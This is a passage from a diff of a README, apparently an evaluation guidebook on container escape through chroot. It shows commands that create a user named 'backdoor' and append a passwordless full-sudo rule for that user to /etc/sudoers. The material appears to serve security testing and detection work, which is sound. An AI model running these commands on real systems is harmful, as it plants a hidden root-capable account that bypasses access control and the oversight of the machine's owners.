spyderbat/eval/guidebook/src/container_escape_chroot/README.md

 adduser backdoor
 ```

+Provide values for the password and name if asked, or hit enter to skip them.
 Next, we need to give the backdoor user permission to use `sudo` so that they can get root access:

 ```sh
 echo 'backdoor ALL=(ALL) NOPASSWD: ALL' | sudo tee -a /etc/sudoers